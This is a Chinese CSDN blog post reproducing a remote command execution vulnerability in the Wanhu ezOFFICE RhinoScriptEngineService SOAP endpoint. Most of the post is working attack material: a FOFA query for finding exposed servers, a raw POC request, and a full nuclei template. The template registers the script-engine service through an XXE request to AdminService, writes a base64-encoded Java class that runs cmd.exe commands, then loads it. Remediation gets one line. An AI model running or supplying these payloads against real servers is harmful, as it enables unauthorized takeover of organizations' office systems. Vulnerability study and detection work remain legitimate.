万户ezoffice RhinoScriptEngineService接口rce

最新推荐文章于 2024-09-02 09:29:49 发布
最新推荐文章于 2024-09-02 09:29:49 发布
阅读量548 收藏 5
点赞数 9
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36334672/article/details/136448792
版权

万户ezoffice RhinoScriptEngineService接口rce漏洞复现

1.漏洞介绍

万户ezoffice RhinoScriptEngineService接口存在rce漏洞,可以直接控制服务器

2.漏洞编号
CVECNVDCNNVD
---

3.影响范围
名称版本号
-

4.检索特征

FOFA:app=“万户网络-ezOFFICE”
在这里插入图片描述

5.POC
POST http://127.0.0.1/services/./././RhinoScriptEngineService HTTP/1.1
Host: 127.0.0.1
User-Agent: Moziilla/5.0 (compatible; Yahoo! Slurp;http://help.yahoo.com/help/us/ysearch/slurp)
Connection: close
Content-Length: 1046
Content-Type: text/xml; charset=utf-8
SOAPAction: ""
Accept-Encoding: gzip, deflate, br

<?xml version='1.0' encoding='UTF-8'?>
  <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:jav="http://javascript.script.sun.com">
    <soapenv:Body>
      <eval xmlns="http://127.0.0.1:8080/services/scriptEngine">
        <arg0 xmlns="">
          <![CDATA[
          try {
          load("nashorn:Moziilla_compat.js");
          } catch (e) {
          }
          importPackage(Packages.java.io);
          importPackage(Packages.java.lang);
          importPackage(Packages.java.util);
          importPackage(Packages.java.net);

          new URLClassLoader([new File('../server').toURL()]).loadClass('Test12').getConstructor([Class.forName("java.lang.String")]).newInstance(["ver"]).toString()


          ]]>
        </arg0>
        <arg1 xmlns="" xsi:type="urn:SimpleScriptContext" xmlns:urn="urn:beanservice">
        </arg1>
      </eval>
    </soapenv:Body>
  </soapenv:Envelope>

在这里插入图片描述

nuclei检测

id: wanhu-ezoffice-rhinoscriptengineservice-rce

info:
  name: 万户ezoffice RhinoScriptEngineService接口存在rce
  author: monster
  severity: critical
  tags: wanhu,ezoffice,rce,oa
  metadata: 
    fofa-query: app="万户网络-ezOFFICE"
    verified: true
    max-request: 3

http:
  - raw:
      - |
       POST /defaultroot/xfservices/././././GeneralWeb HTTP/1.1
       Host: {{Hostname}}
       User-Agent: Moziilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
       Content-Type: text/xml;charset=UTF-8
       SOAPAction: 
 
       <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:gen="http://com.whir.service/GeneralWeb">
          <soapenv:Header/>
          <soapenv:Body>
             <gen:OAManager>
                <gen:input>&lt;?xml version="1.0" encoding="UTF-8"?&gt;
                  &lt;!DOCTYPE root [
                  &lt;!ENTITY x SYSTEM "http://127.0.0.1:{{Port}}/defaultroot/services/./././AdminService?method=!--%3E%3Cdeployment%20xmlns%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22%20xmlns%3Ajava%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2Fproviders%2Fjava%22%3E%3Cservice%20name%3D%22RhinoScriptEngineService%22%20provider%3D%22java%3ARPC%22%3E%3Cparameter%20name%3D%22className%22%20value%3D%22com.sun.script.javascript.RhinoScriptEngine%22%20%2F%3E%3Cparameter%20name%3D%22allowedMethods%22%20value%3D%22eval%22%20%2F%3E%3CtypeMapping%20deserializer%3D%22org.apache.axis.encoding.ser.BeanDeserializerFactory%22%20type%3D%22java%3Ajavax.script.SimpleScriptContext%22%20qname%3D%22ns%3ASimpleScriptContext%22%20serializer%3D%22org.apache.axis.encoding.ser.BeanSerializerFactory%22%20xmlns%3Ans%3D%22urn%3Abeanservice%22%20regenerateElement%3D%22false%22%3E%3C%2FtypeMapping%3E%3C%2Fservice%3E%3C%2Fdeployment"&gt;]&gt;
                  &lt;root&gt;&amp;x;&lt;/root&gt;
                </gen:input>
             </gen:OAManager>
          </soapenv:Body>
       </soapenv:Envelope>

      - |
       POST /defaultroot/services/./././RhinoScriptEngineService HTTP/1.1
       Host: {{Hostname}}
       User-Agent: Moziilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
       Content-Type: text/xml; charset=utf-8
       SOAPAction: ""

       <?xml version='1.0' encoding='UTF-8'?>
         <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:jav="http://javascript.script.sun.com">
           <soapenv:Body>
             <eval xmlns="http://127.0.0.1:8080/services/scriptEngine">
               <arg0 xmlns="">
                 <![CDATA[
                 try {
                 load("nashorn:Moziilla_compat.js");
                 } catch (e) {
                 }
                 importPackage(Packages.java.io);
                 importPackage(Packages.java.lang);
                 importPackage(Packages.javax.crypto);
                 importPackage(Packages.sun.misc);
                 importPackage(Packages.sun.reflect.misc);
                 importPackage(Packages.javax.crypto.spec);

                 var file = new File("../server/Test12.class");

                 var fos = new FileOutputStream(file);
                 var base64Decoder = new BASE64Decoder();
                 var decodeContent = base64Decoder.decodeBuffer("yv66vgAAADIAcwoADgA2CAA3CQAfADgIADkKAAcAOggAOwcAPAcAPQcAPgcAPwkAQABBCgAHAEIKAEMARAcARQgARggARwoAQABICgBDAEkHAEoKABMASwcATAoAFQA2CgBNAE4KABUATwoAFQBQCgBNAFEKAAoAUgcAUwcAVAoAHQBVBwBWAQAGcmVzdWx0AQASTGphdmEvbGFuZy9TdHJpbmc7AQAGPGluaXQ+AQAVKExqYXZhL2xhbmcvU3RyaW5nOylWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEADVN0YWNrTWFwVGFibGUHAFYHAD8HADwHAFcHAEoHAFgHAFkHAEwHAFMBAAh0b1N0cmluZwEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAApTb3VyY2VGaWxlAQAgVGVzdDEyLmphdmEgZnJvbSBJbnB1dEZpbGVPYmplY3QMACIAWgEAAAwAIAAhAQAVamF2YS5sYW5nLlByb2Nlc3NJbXBsDABbAFwBAAVzdGFydAEAD2phdmEvbGFuZy9DbGFzcwEAE1tMamF2YS9sYW5nL1N0cmluZzsBAA1qYXZhL3V0aWwvTWFwAQAQamF2YS9sYW5nL1N0cmluZwcAXQwAXgBfDABgAGEHAFcMAGIAYwEAEGphdmEvbGFuZy9PYmplY3QBAAdjbWQuZXhlAQACL2MMAGQAZQwAZgBnAQARamF2YS9sYW5nL1Byb2Nlc3MMAGgAaQEAHWphdmEvaW8vQnl0ZUFycmF5T3V0cHV0U3RyZWFtBwBYDABqAGsMAGwAbQwAbgBvDABwAFoMACIAcQEAE2phdmEvbGFuZy9FeGNlcHRpb24BABpqYXZhL2xhbmcvUnVudGltZUV4Y2VwdGlvbgwAIgByAQAGVGVzdDEyAQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kAQATamF2YS9pby9JbnB1dFN0cmVhbQEAAltCAQADKClWAQAHZm9yTmFtZQEAJShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9DbGFzczsBABFqYXZhL2xhbmcvQm9vbGVhbgEABFRZUEUBABFMamF2YS9sYW5nL0NsYXNzOwEAEWdldERlY2xhcmVkTWV0aG9kAQBAKExqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEADXNldEFjY2Vzc2libGUBAAQoWilWAQAHdmFsdWVPZgEAFihaKUxqYXZhL2xhbmcvQm9vbGVhbjsBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAEcmVhZAEABShbQilJAQAFd3JpdGUBAAcoW0JJSSlWAQALdG9CeXRlQXJyYXkBAAQoKVtCAQAFY2xvc2UBAAUoW0IpVgEAGChMamF2YS9sYW5nL1Rocm93YWJsZTspVgAhAB8ADgAAAAEAAAAgACEAAAADAAEAIgAjAAEAJAAAAWcACQAKAAAAxSq3AAEqEgK1AAMSBLgABU0sEgYHvQAHWQMTAAhTWQQTAAlTWQUTAApTWQayAAtTtgAMTi0EtgANLQEHvQAOWQMGvQAKWQMSD1NZBBIQU1kFK1NTWQQBU1kFAVNZBgO4ABFTtgASwAATOgQZBLYAFDoFAzYGEQQAvAg6B7sAFVm3ABY6CBkFGQe2ABdZNgaeABAZCBkHAxUGtgAYp//pGQi2ABk6CRkFtgAaKrsAClkZCbcAG7UAA6cADU27AB1ZLLcAHr+xAAEACgC3ALoAHAACACUAAABOABMAAAAMAAQACgAKAA4AEAAPADMAEAA4ABEAagASAHEAEwB0ABQAewAVAIQAFgCRABcAngAZAKUAGgCqABsAtwAeALoAHAC7AB0AxAAfACYAAAA0AAT/AIQACQcAJwcAKAcAKQcAKgcAKwcALAEHAC0HAC4AABn/ABsAAgcAJwcAKAABBwAvCQABADAAMQABACQAAAAdAAEAAQAAAAUqtAADsAAAAAEAJQAAAAYAAQAAACMACQAyADMAAQAkAAAAGQAAAAEAAAABsQAAAAEAJQAAAAYAAQAAACgAAQA0AAAAAgA1");
                 fos.write(decodeContent, new Integer(0), new Integer(decodeContent.length));
                 fos.close();

                 ]]>
               </arg0>
             <arg1 xmlns="" xsi:type="urn:SimpleScriptContext" xmlns:urn="urn:beanservice">
             </arg1>
           </eval>
         </soapenv:Body>
       </soapenv:Envelope>

      - |
       POST //defaultroot/services/./././RhinoScriptEngineService HTTP/1.1
       Host: {{Hostname}}
       User-Agent: Moziilla/5.0 (compatible; Yahoo! Slurp;http://help.yahoo.com/help/us/ysearch/slurp)
       Content-Type: text/xml; charset=utf-8
       SOAPAction: ""

       <?xml version='1.0' encoding='UTF-8'?>
         <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:jav="http://javascript.script.sun.com">
           <soapenv:Body>
             <eval xmlns="http://127.0.0.1:8080/services/scriptEngine">
               <arg0 xmlns="">
                 <![CDATA[
                 try {
                 load("nashorn:Moziilla_compat.js");
                 } catch (e) {
                 }
                 importPackage(Packages.java.io);
                 importPackage(Packages.java.lang);
                 importPackage(Packages.java.util);
                 importPackage(Packages.java.net);

                 new URLClassLoader([new File('../server').toURL()]).loadClass('Test12').getConstructor([Class.forName("java.lang.String")]).newInstance(["ver"]).toString()
 

                 ]]>
               </arg0>
               <arg1 xmlns="" xsi:type="urn:SimpleScriptContext" xmlns:urn="urn:beanservice">
               </arg1>
             </eval>
           </soapenv:Body>
         </soapenv:Envelope>

    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 500 && contains(body_1, 'java.lang.NullPointerException')"
          - "status_code_2 == 200"
          - "status_code_3 == 200 && contains(body_3, 'Microsoft Windows')"
        condition: and

# 在第三个包 110行 执行命令,默认执行的命令为ver

6.修复建议

更新到最新版本

7.参考信息
qq_36334672
关注
万户OA-RhinoScriptEngineService命令执行
weixin_43567873的博客
03-06 79
万户OA-RhinoScriptEngineService命令执行
万户 ezOFFICE 协同管理平台 getAutoCode接口SQL注入漏洞复现 [附POC]
薛定谔嘚喵博客
08-04 153
万户 ezOFFICE getAutoCodejsp接口处存在SQL注入漏洞,未经身份验证的远程攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限。
万户ezOFFICE数据字典
04-02
万户ezOFFICE数据字典
【漏洞复现】万户协同办公平台 RhinoScriptEngineService 存在远程命令执行漏洞
https://blog.echo234.cn/
03-29 409
万户ezOFFICE协同管理平台是一个综合信息基础应用平台。 万户协同办公平台 RhinoScriptEngineService存在远程命令执行漏洞。
开源项目推荐:Rhino_script_engine——轻量级Android脚本处理解决方案
最新发布
gitblog_00039的博客
09-02 327
开源项目推荐:Rhino_script_engine——轻量级Android脚本处理解决方案 rhino-android Give access to RhinoScriptEngine from the JSR223 interfaces on Android JRE.项目地址:https://gitcode.com/gh_mirrors/rhi/rhino-android 在当今快速迭代的移...
万户OA ezOffice RhinoScriptEngineService 命令执行漏洞-1day未公开漏洞
weixin_43167326的博客
02-26 559
万户OA RhinoScriptEngineService接口存在命令执行漏洞,此漏洞可能导致攻击者获取系统权限、执行任意命令,严重威胁系统的机密性和完整性。
【漏洞复现】万户 ezOFFICE协同管理平台 getAutoCode SQL注入漏洞复现(CVE-2024-18749)
网安小白
08-05 466
万户OA ezoffice万户网络协同办公产品多年来一直将主要精力致力于中高端市场的一款OA协同办公软件产品,统一的基础管理平台,实现用户数据统一管理、权限统一分配、身份统一认证。统一规划门户网站群和协同办公平台,将外网信息维护、客户服务、互动交流和日常工作紧密结合起来,有效提高工作效率。
万户协同办公平台ezoffice SendFileCheckTemplateEdit.jsp接口存在SQL注入漏洞 附POC
nnn2188185的博客
11-29 473
微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发万户ezOFFICE集团版协同平台以工作流程、知识管理、沟通交流和辅助办公四大核心应用。
漏洞复现-万户ezOFFICE系列
aming小老弟
03-12 1474
万户OA[+]万户协同办公平台 ezoffice存在未授权访问漏洞wanhu_office|app=“万户ezOFFICE协同管理平台”万户ezEIP。
万户 ezOFFICE协同管理平台 getAutoCode SQL注入漏洞复现(XVE-2024-18749)
0xSec
08-01 782
万户 ezOFFICEgetAutoCode.jsp 接口处存在SQL注入漏洞,未经身份验证的远程攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限。
万户 ezOFFICE graph_include.jsp SQL注入漏洞复现
0xSec
08-09 654
万户 ezOFFICE/defaultroot/platform/report/graphreport/graph_include.jsp接口处存在SQL注入漏洞,未授权的攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限。
EzOffice.exe
06-14
Ashetch GPS数据格式转换,导入导出软件
Rhino脚本引擎技术介绍
04-19
本文介绍了Rhino脚本引擎,如何在Java中使用脚本引擎调用javascript,以及javascript和java间的交互,并给与示例代码。
「漏洞复现」时空智友ERP系统updater.uploadStudioFile 任意文件上传漏洞
qq_39894062的博客
06-30 860
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!
万户协同办公平台 ezoffice未授权访问漏洞
xiaokp7的博客
09-13 859
万户ezOFFICE协同管理平台是一个综合信息基础应用平台。万户ezoffice协同管理平台存在未授权访问漏洞,攻击者可以从evoInterfaceServlet接口获得系统登录账号和用MD5加密的密码。
【复现】万户ezoffice协同管理平台 任意文件读取漏洞_30
fushuang333的博客
01-27 634
【复现】万户ezoffice协同管理平台 任意文件读取漏洞,通过提交专门设计的输入,攻击者就可以在被访问的文件系统中读取或写入任意内容
【复现】万户ezoffice协同管理平台sql注入漏洞_69
fushuang333的博客
04-09 782
【复现】万户ezoffice协同管理平台sql注入漏洞,攻击者未经授权可以访问数据库中的数据,盗取用户的隐私以及个人信息,造成用户的信息泄露。
【工具】ScriptEngine--Java动态执行JS Javascript脚本(可调用java的方法) 增加代码灵活性 适合复杂业务经常变动
我是Superman丶的博客
07-06 7057
错误原因很明显脚本引擎执行脚本语句报错,因为执行引擎为空。查询相关资料Jdk8自带的JavaScript引擎。再升级到Jdk9后就被移除了,从而导致报错。JDK9+ 需要单独依赖。
【漏洞复现】万户OA RhinoScriptEngineService 命令执行漏洞
qq_67810151的博客
02-27 909
万户ezOFFICE协同管理平台涵盖门户自定义平台、信息知识平台管理、系统管理平台功能,它以工作流引擎为底层服务,以通讯沟通平台为交流手段,以门户自定义平台为信息推送显示平台,为用户提供集成的协同工作环境。
万户 ezoffice 文件上传漏洞复现
12-17
万户ezoffice是一个办公软件,用于处理各种办公文档。文件上传漏洞是指系统存在一个安全漏洞,允许攻击者在上传文件时注入恶意代码或者上传非法文件到服务器中。这个问题的产生可能是开发过程中没有充分考虑安全性,或者是没有对用户上传的文件进行正确的校验和过滤操作。 想要复现这个漏洞,可以按照以下步骤进行: 1. 准备一个万户ezoffice的测试环境,包括安装相关软件和配置服务器环境。 2. 创建一个测试账号,并登录到系统中。 3. 在系统中找到文件上传的功能,并尝试上传一个文件。可以选择一个存在恶意代码的文件,例如一个带有JavaScript注入的HTML文件。 4. 观察系统的反应。如果文件上传成功,并且系统没有对文件进行正确的处理和过滤,那么就证明存在文件上传漏洞。 5. 尝试利用漏洞进行攻击,可以尝试上传一个病毒文件,或者注入一段恶意代码到服务器中。 6. 观察系统的反应和功能是否受到影响,以及漏洞的程度和影响范围。 在复现漏洞后,可以通过以下方法来修复和防止这个漏洞: 1. 对用户上传的文件进行严格的校验和过滤,确保只有合法的文件和内容能够被上传和处理。 2. 对文件内容进行安全扫描和检测,以防止上传病毒文件或者含有恶意代码的文件。 3. 在文件上传的功能上添加访问控制和权限验证,确保只有经过认证的用户才能进行文件上传操作。 4. 定期对系统进行安全审计和漏洞扫描,及时发现和修复潜在的安全问题。 5. 提高开发人员的安全意识和安全知识,确保在软件开发和设计中充分考虑安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值